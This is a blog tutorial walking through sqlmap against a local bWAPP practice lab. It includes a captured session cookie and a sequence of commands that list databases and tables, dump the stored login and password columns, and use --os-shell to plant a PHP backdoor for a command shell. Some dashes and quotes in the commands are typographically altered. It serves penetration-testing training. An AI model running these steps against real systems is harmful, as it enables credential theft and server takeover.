Database Penetration Testing using Sqlmap (Part 1)

Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  • Enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
  • Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.

For more details visit their official site sqlmap.org

 Firstly you need to install bWAPP lab in your XAMPP or WAMP server, read full article from here now open the bWAPP in your pc and login with following credentials:

Let’s begin!!!

Start service Apache and Mysql in Xampp or Wamp server. Let’s open the local host address in browser as I am using 192.168.1.101:81/bWAPP/login.php. Enter user and password as bee and bug respectively.

Set security level low, from list box chooses your bug select SQL-Injection (GET/SEARCH) now and click on hack.

Type any name of movie in the text field and just after that start the burp suite in kali Linux.

To capture the cookie of bWAPP click on proxy tag then click to inception is on button, come back to bWAPP and now click to submit. Use intercepted data within sqlmap commands.

Open the terminal in kali Linux and type the sqlmap command.

From intercepted data under burp suite copy the referrer, cookie and target and use this in the following command.

sqlmap -u “http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43″ –dbs

This tool will now analysis the url for making connection from target and then use sql queries in given cookies for sql injection attack and fetch all names of database. So if you notice image given below we have caught all name of database. Choose any name for fetching more details.

I am interested in bwapp so that I could fetch all table under bwapp therefore I will type following command on terminal.

sqlmap -u “http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43″ –dbs –D bwapp –tables

Here we have got 5 tables name which are: blog, heroes, movies, users, visitors.

Now if you want to penetrate more about table use the following command for each and every table.

I want to know columns details of blog table using above as I have got it as you can see in image given below.

sqlmap -u “http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43″ –dbs –D bwapp –T blog –columns

This command fetches all columns of blog table. It shows there are 4 columns with their data types.

To know more about blog table now I will seek its column from inside using following command which will dump all field inside blog’s columns.

 sqlmap -u “http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43″ -D bwapp –T blog –C date,entry,id,owner –dump

Blog table appears to be empty as all fields are left blank.

I want to know columns details of users table.

 sqlmap -u “http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43″ –dbs –D bwapp –T users –columns

We have got all columns of users table with their data types.

Again I will seek its column from inside use the following command which will now dump all fields inside user’s columns.

sqlmap -u “http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43″ –D bwapp –T users –C id,emails,login,password,secret –dump

Here I founds only two entries as you see sqlmap has dump only those column which I have mentioned in command not the whole table.

Repeat the whole process again for table movies.

sqlmap -u “http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43″ –D bwapp –T movies –columns

In same way this tool has fetched all columns with their data types under movie table.

Again I want to penetrate its column so I will use same command by modifying its table name.

sqlmap -u “http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43″ –D bwapp –T movies –C genre,id,imdb,main_character,release_year,tickets_stock,title –dump

Wow!! Their are10 entries as if you will see this tool have again dump all data for which I had made request.

Once again repeat the whole process for table heroes.

sqlmap -u “http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43″ –D bwapp –T heroes –columns

We have 4 columns with their data types.

For more information repeat the process which will dump details under its columns.

sqlmap -u “http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43″ -D bwapp -T heroes -C id,login,password,secret –dump

We have got id, login, password and secret entries. Read the details from table.

Again repeat the same process for our last table which is visitors.

sqlmap -u “http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43″ -D bwapp -T visitors –columns

Table visitors are also having 4 columns with its data types.

Let’s penetrate its columns also

sqlmap -u “http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43″ -D bwapp -T visitors -C date,id,ip_address,user_agent –dump

Cool!!! Like blog table it is also left blank. But the task is not ended here the more interesting things begins now.

We have traverse each and every table completely but more important than to fetch details of tables is to gain access of os-shell for any web server.

sqlmap -u “http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43″ -D bwapp –os-shell

Above command will try to generate a backdoor; type 4 for PHP payload and type 1 for common location to use as writable directory.

Awesome!!!  We got the shell.

os-shell> net users

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Related Posts Plugin for WordPress, Blogger...

Leave a Reply